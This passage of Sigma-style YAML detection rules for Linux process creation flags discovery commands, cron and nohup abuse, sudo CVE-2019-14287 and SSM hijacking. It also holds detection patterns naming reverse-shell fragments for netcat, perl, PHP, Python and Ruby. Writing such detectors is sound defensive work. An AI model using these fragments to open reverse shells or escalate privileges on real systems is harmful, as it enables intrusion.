Adversaries may attempt to find local system groups and permission settings 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md 7 | author: Ömer Günal, Alejandro Ortuno, oscd.community 8 | date: 2020/10/11 9 | modified: 2022/11/27 10 | tags: 11 | - attack.discovery 12 | - attack.t1069.001 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection_1: 18 | Image|endswith: '/groups' 19 | selection_2: 20 | Image|endswith: 21 | - '/cat' 22 | - '/head' 23 | - '/tail' 24 | - '/more' 25 | CommandLine|contains: '/etc/group' 26 | condition: 1 of selection* 27 | falsepositives: 28 | - Legitimate administration activities 29 | level: low 30 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Potential GobRAT File Discovery Via Grep 2 | id: e34cfa0c-0a50-4210-9cb3-5632d08eb041 3 | status: experimental 4 | description: Detects the use of grep to discover specific files created by the GobRAT malware 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 8 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 9 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 10 | date: 2023/06/02 11 | tags: 12 | - attack.discovery 13 | - attack.t1082 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|endswith: '/grep' 20 | CommandLine|contains: 21 | - 'apached' 22 | - 'frpc' 23 | - 'sshd.sh' 24 | - 'zone.arm' 25 | condition: selection 26 | falsepositives: 27 | - Unknown 28 | level: high 29 | 
-------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml: -------------------------------------------------------------------------------- 1 | title: Named Pipe Created Via Mkfifo 2 | id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4 3 | status: experimental 4 | description: Detects the creation of a new named pipe using the "mkfifo" utility 5 | references: 6 | - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk 7 | - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally 8 | author: Nasreddine Bencherchali (Nextron Systems) 9 | date: 2023/06/16 10 | tags: 11 | - attack.execution 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | Image|endswith: '/mkfifo' 18 | condition: selection 19 | falsepositives: 20 | - Unknown 21 | level: low 22 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml: -------------------------------------------------------------------------------- 1 | title: Potentially Suspicious Named Pipe Created Via Mkfifo 2 | id: 999c3b12-0a8c-40b6-8e13-dd7d62b75c7a 3 | related: 4 | - id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4 5 | type: derived 6 | status: experimental 7 | description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location 8 | references: 9 | - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk 10 | - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally 11 | author: Nasreddine Bencherchali (Nextron Systems) 12 | date: 2023/06/16 13 | tags: 14 | - attack.execution 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection: 20 | Image|endswith: '/mkfifo' 21 | # Note: Add more potentially suspicious locations 22 | 
CommandLine|contains: ' /tmp/' 23 | condition: selection 24 | falsepositives: 25 | - Unknown 26 | level: medium 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml: -------------------------------------------------------------------------------- 1 | title: Mount Execution With Hidepid Parameter 2 | id: ec52985a-d024-41e3-8ff6-14169039a0b3 3 | status: experimental 4 | description: Detects execution of the "mount" command with the "hidepid" parameter, which makes processes invisible to other users on the system 5 | references: 6 | - https://blogs.blackberry.com/ 7 | - https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/ 8 | - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 9 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 10 | date: 2023/01/12 11 | tags: 12 | - attack.credential_access 13 | - attack.t1564 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection: 19 | Image|endswith: '/mount' 20 | CommandLine|contains|all: 21 | - 'hidepid=2' 22 | - ' -o ' 23 | condition: selection 24 | falsepositives: 25 | - Unknown 26 | level: medium 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml: -------------------------------------------------------------------------------- 1 | title: Potential Netcat Reverse Shell Execution 2 | id: 7f734ed0-4f47-46c0-837f-6ee62505abd9 3 | status: experimental 4 | description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup. 
5 | references: 6 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 7 | - https://www.revshells.com/ 8 | - https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ 9 | - https://www.infosecademy.com/netcat-reverse-shells/ 10 | - https://man7.org/linux/man-pages/man1/ncat.1.html 11 | author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)' 12 | date: 2023/04/07 13 | tags: 14 | - attack.execution 15 | - attack.t1059 16 | logsource: 17 | category: process_creation 18 | product: linux 19 | detection: 20 | selection_nc: 21 | Image|endswith: 22 | - '/nc' 23 | - '/ncat' 24 | selection_flags: 25 | CommandLine|contains: 26 | - ' -c ' 27 | - ' -e ' 28 | selection_shell: 29 | CommandLine|contains: 30 | - ' ash' 31 | - ' bash' 32 | - ' bsh' 33 | - ' csh' 34 | - ' ksh' 35 | - ' pdksh' 36 | - ' sh' 37 | - ' tcsh' 38 | - '/bin/ash' 39 | - '/bin/bash' 40 | - '/bin/bsh' 41 | - '/bin/csh' 42 | - '/bin/ksh' 43 | - '/bin/pdksh' 44 | - '/bin/sh' 45 | - '/bin/tcsh' 46 | - '/bin/zsh' 47 | - '$IFSash' 48 | - '$IFSbash' 49 | - '$IFSbsh' 50 | - '$IFScsh' 51 | - '$IFSksh' 52 | - '$IFSpdksh' 53 | - '$IFSsh' 54 | - '$IFStcsh' 55 | - '$IFSzsh' 56 | condition: all of selection_* 57 | falsepositives: 58 | - Unlikely 59 | level: high 60 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_nohup.yml: -------------------------------------------------------------------------------- 1 | title: Nohup Execution 2 | id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2 3 | status: test 4 | description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments 5 | references: 6 | - https://gtfobins.github.io/gtfobins/nohup/ 7 | - https://en.wikipedia.org/wiki/Nohup 8 | - https://www.computerhope.com/unix/unohup.htm 9 | author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' 10 | date: 2022/06/06 11 | 
tags: 12 | - attack.execution 13 | - attack.t1059.004 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection: 19 | Image|endswith: '/nohup' 20 | condition: selection 21 | falsepositives: 22 | - Administrators or installed processes that leverage nohup 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Nohup Execution 2 | id: 457df417-8b9d-4912-85f3-9dbda39c3645 3 | related: 4 | - id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2 5 | type: derived 6 | status: experimental 7 | description: Detects execution of binaries located in potentially suspicious locations via "nohup" 8 | references: 9 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 10 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 11 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 12 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 13 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 14 | date: 2023/06/02 15 | tags: 16 | - attack.execution 17 | logsource: 18 | product: linux 19 | category: process_creation 20 | detection: 21 | selection: 22 | Image|endswith: '/nohup' 23 | CommandLine|contains: '/tmp/' 24 | condition: selection 25 | falsepositives: 26 | - Unknown 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml: -------------------------------------------------------------------------------- 1 | title: OMIGOD SCX RunAsProvider ExecuteScript 2 | id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db 3 | status: test 4 | description: | 5 | Rule to detect the use of the SCX 
RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. 6 | Script being executed gets created as a temp file in /tmp folder with a scx* prefix. 7 | Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. 8 | The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including 9 | Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. 10 | references: 11 | - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure 12 | - https://github.com/Azure/Azure-Sentinel/pull/3059 13 | author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC 14 | date: 2021/10/15 15 | modified: 2022/10/05 16 | tags: 17 | - attack.privilege_escalation 18 | - attack.initial_access 19 | - attack.execution 20 | - attack.t1068 21 | - attack.t1190 22 | - attack.t1203 23 | logsource: 24 | product: linux 25 | category: process_creation 26 | detection: 27 | selection: 28 | User: root 29 | LogonId: 0 30 | CurrentDirectory: '/var/opt/microsoft/scx/tmp' 31 | CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx' 32 | condition: selection 33 | falsepositives: 34 | - Legitimate use of SCX RunAsProvider ExecuteScript. 35 | level: high 36 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml: -------------------------------------------------------------------------------- 1 | title: OMIGOD SCX RunAsProvider ExecuteShellCommand 2 | id: 21541900-27a9-4454-9c4c-3f0a4240344a 3 | status: test 4 | description: | 5 | Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. 
6 | SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including 7 | Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. 8 | references: 9 | - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure 10 | - https://github.com/Azure/Azure-Sentinel/pull/3059 11 | author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC 12 | date: 2021/10/15 13 | modified: 2022/10/05 14 | tags: 15 | - attack.privilege_escalation 16 | - attack.initial_access 17 | - attack.execution 18 | - attack.t1068 19 | - attack.t1190 20 | - attack.t1203 21 | logsource: 22 | product: linux 23 | category: process_creation 24 | detection: 25 | selection: 26 | User: root 27 | LogonId: 0 28 | CurrentDirectory: '/var/opt/microsoft/scx/tmp' 29 | CommandLine|contains: '/bin/sh' 30 | condition: selection 31 | falsepositives: 32 | - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. 33 | level: high 34 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml: -------------------------------------------------------------------------------- 1 | title: Potential Perl Reverse Shell Execution 2 | id: 259df6bc-003f-4306-9f54-4ff1a08fa38e 3 | status: experimental 4 | description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity 5 | references: 6 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 7 | - https://www.revshells.com/ 8 | author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)' 9 | date: 2023/04/07 10 | tags: 11 | - attack.execution 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection_img: 17 | Image|endswith: '/perl' 18 | CommandLine|contains: ' -e ' 19 | selection_content: 20 | - CommandLine|contains|all: 21 | - 'fdopen(' 22 | - 
'::Socket::INET' 23 | - CommandLine|contains|all: 24 | - 'Socket' 25 | - 'connect' 26 | - 'open' 27 | - 'exec' 28 | condition: all of selection_* 29 | falsepositives: 30 | - Unlikely 31 | level: high 32 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml: -------------------------------------------------------------------------------- 1 | title: Potential PHP Reverse Shell 2 | id: c6714a24-d7d5-4283-a36b-3ffd091d5f7e 3 | status: experimental 4 | description: | 5 | Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. 6 | Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection. 7 | references: 8 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 9 | - https://www.revshells.com/ 10 | author: '@d4ns4n_' 11 | date: 2023/04/07 12 | tags: 13 | - attack.execution 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|contains: '/php' 20 | CommandLine|contains|all: 21 | - ' -r ' 22 | - 'fsockopen' 23 | CommandLine|contains: 24 | - 'ash' 25 | - 'bash' 26 | - 'bsh' 27 | - 'csh' 28 | - 'ksh' 29 | - 'pdksh' 30 | - 'sh' 31 | - 'tcsh' 32 | - 'zsh' 33 | condition: selection 34 | falsepositives: 35 | - Unknown 36 | level: high 37 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_process_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Process Discovery 2 | id: 4e2f5868-08d4-413d-899f-dc2f1508627b 3 | status: stable 4 | description: | 5 | Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. 
6 | Information obtained could be used to gain an understanding of common software/applications running on systems within the network 7 | references: 8 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md 9 | author: Ömer Günal, oscd.community 10 | date: 2020/10/06 11 | modified: 2022/07/07 12 | tags: 13 | - attack.discovery 14 | - attack.t1057 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|endswith: 21 | - '/ps' 22 | - '/top' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate administration activities 26 | level: informational 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml: -------------------------------------------------------------------------------- 1 | title: Connection Proxy 2 | id: 72f4ab3f-787d-495d-a55d-68c2ff46cf4c 3 | status: test 4 | description: Detects setting proxy configuration 5 | references: 6 | - https://attack.mitre.org/techniques/T1090/ 7 | author: Ömer Günal 8 | date: 2020/06/17 9 | modified: 2022/10/05 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1090 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | CommandLine|contains: 19 | - 'http_proxy=' 20 | - 'https_proxy=' 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administration activities 24 | level: low 25 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml: -------------------------------------------------------------------------------- 1 | title: Python Spawning Pretty TTY 2 | id: c4042d54-110d-45dd-a0e1-05c47822c937 3 | related: 4 | - id: 32e62bc7-3de0-4bb1-90af-532978fe42c0 5 | type: similar 6 | status: experimental 7 | description: Detects python spawning a 
pretty tty which could be indicative of potential reverse shell activity 8 | references: 9 | - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ 10 | author: Nextron Systems 11 | date: 2022/06/03 12 | modified: 2023/06/16 13 | tags: 14 | - attack.execution 15 | - attack.t1059 16 | logsource: 17 | category: process_creation 18 | product: linux 19 | detection: 20 | selection_img: 21 | - Image|endswith: 22 | - '/python' 23 | - '/python2' 24 | - '/python3' 25 | - Image|contains: 26 | - '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink 27 | - '/python3.' 28 | selection_cli_1: 29 | CommandLine|contains|all: 30 | - 'import pty' 31 | - '.spawn(' 32 | selection_cli_2: 33 | CommandLine|contains: 'from pty import spawn' 34 | condition: selection_img and 1 of selection_cli_* 35 | falsepositives: 36 | - Unknown 37 | level: high 38 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml: -------------------------------------------------------------------------------- 1 | title: Potential Python Reverse Shell 2 | id: 32e62bc7-3de0-4bb1-90af-532978fe42c0 3 | related: 4 | - id: c4042d54-110d-45dd-a0e1-05c47822c937 5 | type: similar 6 | status: experimental 7 | description: Detects executing python with keywords related to network activity that could indicate a potential reverse shell 8 | references: 9 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 10 | - https://www.revshells.com/ 11 | author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)' 12 | date: 2023/04/24 13 | tags: 14 | - attack.execution 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection: 20 | Image|contains: 'python' 21 | CommandLine|contains|all: 22 | - ' -c ' 23 | - 'import' 24 | - 'pty' 25 | - 'spawn(' 26 | - '.connect' 27 | condition: selection 28 | 
falsepositives: 29 | - Unknown 30 | level: high 31 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Linux Remote System Discovery 2 | id: 11063ec2-de63-4153-935e-b1a8b9e616f1 3 | status: test 4 | description: Detects the enumeration of other remote systems. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md 7 | author: Alejandro Ortuno, oscd.community 8 | date: 2020/10/22 9 | modified: 2021/11/27 10 | tags: 11 | - attack.discovery 12 | - attack.t1018 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection_1: 18 | Image|endswith: '/arp' 19 | CommandLine|contains: '-a' 20 | selection_2: 21 | Image|endswith: '/ping' 22 | CommandLine|contains: 23 | - ' 10.' # 10.0.0.0/8 24 | - ' 192.168.' # 192.168.0.0/16 25 | - ' 172.16.' # 172.16.0.0/12 26 | - ' 172.17.' 27 | - ' 172.18.' 28 | - ' 172.19.' 29 | - ' 172.20.' 30 | - ' 172.21.' 31 | - ' 172.22.' 32 | - ' 172.23.' 33 | - ' 172.24.' 34 | - ' 172.25.' 35 | - ' 172.26.' 36 | - ' 172.27.' 37 | - ' 172.28.' 38 | - ' 172.29.' 39 | - ' 172.30.' 40 | - ' 172.31.' 41 | - ' 127.' # 127.0.0.0/8 42 | - ' 169.254.' # 169.254.0.0/16 43 | condition: 1 of selection* 44 | falsepositives: 45 | - Legitimate administration activities 46 | level: low 47 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_remove_package.yml: -------------------------------------------------------------------------------- 1 | title: Linux Package Uninstall 2 | id: 95d61234-7f56-465c-6f2d-b562c6fedbc4 3 | status: experimental 4 | description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg". 
5 | references: 6 | - https://sysdig.com/blog/mitre-defense-evasion-falco 7 | - https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command 8 | - https://linuxhint.com/uninstall_yum_package/ 9 | - https://linuxhint.com/uninstall-debian-packages/ 10 | author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems) 11 | date: 2023/03/09 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1070 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection_yum: 20 | Image|endswith: '/yum' 21 | CommandLine|contains: 22 | - 'erase' 23 | - 'remove' 24 | selection_apt: 25 | Image|endswith: 26 | - '/apt' 27 | - '/apt-get' 28 | CommandLine|contains: 29 | - 'remove' 30 | - 'purge' 31 | selection_dpkg: 32 | Image|endswith: '/dpkg' 33 | CommandLine|contains: 34 | - '--remove ' 35 | - ' -r ' 36 | selection_rpm: 37 | Image|endswith: '/rpm' 38 | CommandLine|contains: ' -e ' 39 | condition: 1 of selection_* 40 | falsepositives: 41 | - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting). 42 | level: low 43 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml: -------------------------------------------------------------------------------- 1 | title: Potential Ruby Reverse Shell 2 | id: b8bdac18-c06e-4016-ac30-221553e74f59 3 | status: experimental 4 | description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. 
This could be an indication of a potential attempt to setup a reverse shell 5 | references: 6 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 7 | - https://www.revshells.com/ 8 | author: '@d4ns4n_' 9 | date: 2023/04/07 10 | tags: 11 | - attack.execution 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | Image|contains: 'ruby' 18 | CommandLine|contains|all: 19 | - ' -e' 20 | - 'rsocket' 21 | - 'TCPSocket' 22 | CommandLine|contains: 23 | - ' ash' 24 | - ' bash' 25 | - ' bsh' 26 | - ' csh' 27 | - ' ksh' 28 | - ' pdksh' 29 | - ' sh' 30 | - ' tcsh' 31 | condition: selection 32 | falsepositives: 33 | - Unknown 34 | level: medium 35 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml: -------------------------------------------------------------------------------- 1 | title: Scheduled Cron Task/Job - Linux 2 | id: 6b14bac8-3e3a-4324-8109-42f0546a347f 3 | status: test 4 | description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. 
5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md 7 | author: Alejandro Ortuno, oscd.community 8 | date: 2020/10/06 9 | modified: 2022/11/27 10 | tags: 11 | - attack.execution 12 | - attack.persistence 13 | - attack.privilege_escalation 14 | - attack.t1053.003 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection: 20 | Image|endswith: 'crontab' 21 | CommandLine|contains: '/tmp/' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administration activities 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Security Software Discovery - Linux 2 | id: c9d8b7fd-78e4-44fe-88f6-599135d46d60 3 | status: test 4 | description: Detects usage of system utilities (only grep and egrep for now) to discover installed security software 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md 7 | author: Daniil Yugoslavskiy, oscd.community 8 | date: 2020/10/19 9 | modified: 2022/11/27 10 | tags: 11 | - attack.discovery 12 | - attack.t1518.001 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 19 | # You can add more grep variations such as fgrep, rgrep...etc 20 | - '/grep' 21 | - '/egrep' 22 | CommandLine|contains: 23 | - 'nessusd' # nessus vulnerability scanner 24 | - 'td-agent' # fluentd log shipper 25 | - 'packetbeat' # elastic network logger/shipper 26 | - 'filebeat' # elastic log file shipper 27 | - 'auditbeat' # elastic auditing agent/log shipper 28 | - 'osqueryd' # facebook osquery 29 | - 'cbagentd' # carbon black 30 | - 'falcond' # crowdstrike 
falcon 31 | condition: selection 32 | falsepositives: 33 | - Legitimate activities 34 | level: low 35 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml: -------------------------------------------------------------------------------- 1 | title: Disable Or Stop Services 2 | id: de25eeb8-3655-4643-ac3a-b662d3f26b6b 3 | status: test 4 | description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services 5 | references: 6 | - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/09/15 9 | tags: 10 | - attack.defense_evasion 11 | logsource: 12 | category: process_creation 13 | product: linux 14 | detection: 15 | selection: 16 | Image|endswith: 17 | - '/service' 18 | - '/systemctl' 19 | - '/chkconfig' 20 | CommandLine|contains: 21 | - 'stop' 22 | - 'disable' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate administration activities 26 | level: medium 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml: -------------------------------------------------------------------------------- 1 | title: Setuid and Setgid 2 | id: c21c4eaa-ba2e-419a-92b2-8371703cbe21 3 | status: test 4 | description: Detects suspicious change of file privileges with chown and chmod commands 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md 7 | - https://attack.mitre.org/techniques/T1548/001/ 8 | author: Ömer Günal 9 | date: 2020/06/16 10 | modified: 2022/10/05 11 | tags: 12 | - attack.persistence 13 | - attack.t1548.001 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection_root: 19 | 
CommandLine|contains: 'chown root' 20 | selection_perm: 21 | CommandLine|contains: 22 | - ' chmod u+s' 23 | - ' chmod g+s' 24 | condition: all of selection_* 25 | falsepositives: 26 | - Legitimate administration activities 27 | level: low 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml: -------------------------------------------------------------------------------- 1 | title: Potential Linux Amazon SSM Agent Hijacking 2 | id: f9b3edc5-3322-4fc7-8aa3-245d646cc4b7 3 | status: experimental 4 | description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. 5 | references: 6 | - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan 7 | - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/ 8 | - https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/ 9 | author: Muhammad Faisal 10 | date: 2023/08/03 11 | tags: 12 | - attack.command_and_control 13 | - attack.persistence 14 | - attack.t1219 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection: 20 | Image|endswith: '/amazon-ssm-agent' 21 | CommandLine|contains|all: 22 | - '-register ' 23 | - '-code ' 24 | - '-id ' 25 | - '-region ' 26 | condition: selection 27 | falsepositives: 28 | - Legitimate activity of system administrators 29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml: -------------------------------------------------------------------------------- 1 | title: Sudo Privilege Escalation CVE-2019-14287 2 | id: f74107df-b6c6-4e80-bf00-4170b658162b 3 | status: test 4 | description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 5 | references: 6 
| - https://www.openwall.com/lists/oss-security/2019/10/14/1 7 | - https://access.redhat.com/security/cve/cve-2019-14287 8 | - https://twitter.com/matthieugarin/status/1183970598210412546 9 | author: Florian Roth (Nextron Systems) 10 | date: 2019/10/15 11 | modified: 2022/10/05 12 | tags: 13 | - attack.privilege_escalation 14 | - attack.t1068 15 | - attack.t1548.003 16 | - cve.2019.14287 17 | logsource: 18 | product: linux 19 | category: process_creation 20 | detection: 21 | selection: 22 | CommandLine|contains: ' -u#' 23 | condition: selection 24 | falsepositives: 25 | - Unlikely 26 | level: high 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml: -------------------------------------------------------------------------------- 1 | title: Chmod Suspicious Directory 2 | id: 6419afd1-3742-47a5-a7e6-b50386cd15f8 3 | status: test 4 | description: Detects chmod targeting files in abnormal directory paths. 5 | references: 6 | - https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/ 7 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md 8 | author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' 9 | date: 2022/06/03 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1222.002 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: '/chmod' 19 | CommandLine|contains: 20 | - '/tmp/' 21 | - '/.Library/' 22 | - '/etc/' 23 | - '/opt/' 24 | condition: selection 25 | falsepositives: 26 | - Admin changing file permissions. 
27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Container Residence Discovery Via Proc Virtual FS 2 | id: 746c86fb-ccda-4816-8997-01386263acc4 3 | status: experimental 4 | description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem 5 | references: 6 | - https://blog.skyplabs.net/posts/container-detection/ 7 | - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker 8 | tags: 9 | - attack.discovery 10 | - attack.t1082 11 | author: Seth Hanford 12 | date: 2023/08/23 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection_tools: 18 | Image|endswith: 19 | - 'awk' 20 | - '/cat' 21 | - 'grep' 22 | - '/head' 23 | - '/less' 24 | - '/more' 25 | - '/nl' 26 | - 